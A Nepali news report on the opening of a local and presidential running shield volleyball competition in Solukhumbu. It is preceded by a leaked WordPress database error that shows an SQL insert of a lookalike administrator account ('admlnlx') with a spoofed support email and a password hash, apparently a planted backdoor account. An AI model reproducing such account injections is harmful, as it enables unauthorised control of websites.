WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bq5AlSfGHowLzDXJRNCQohGRSgNxfi.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 12:52:19', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिका चौथो अध्यक्ष रनिङ शिल्ड तथा १३ औँ राष्ट्रपति रनिङ शिल्ड प्रतियोगिता आजबाट सुरु भएको छ ।
आजबाट सन्चालन भएको कार्यक्रम प्रदेश १ का सामाजिक विकास मन्त्री बुद्धिकुमार राजभण्डारीले उद्घाटन गरेका हुन् ।
थुलुङ दुधकोशी गाउँपालिकाका अध्यक्ष अशिम राईको सभापतित्वमा सम्पन्न उद्घाटन कार्यक्रममा प्रदेश सांसद गोम्बु शेर्पा, प्रमुख जिल्ला अधिकारी बसन्त भट्टराई र छिमेकी पालिकाका जनप्रतिनिधिहरुको उपस्थिति थियो ।चौथो अध्यक्ष रनिङ शिल्डमा महिला तथा पुरुष भलिवल प्रतियोगिता र स्थानीय तह स्तरीय राष्ट्रपति रनिङ शिल्ड प्रतियोगिता सञ्चालन हुने गाउँपालिकाले जनाएको छ ।
गाउँपालिकाले जनाए अनुसार स्थानीय तथा राष्ट्रिय स्तरका कलाकारहरुको साथमा भव्य साँस्कृतिक साँझको समेत आयोजना गरिएको छ।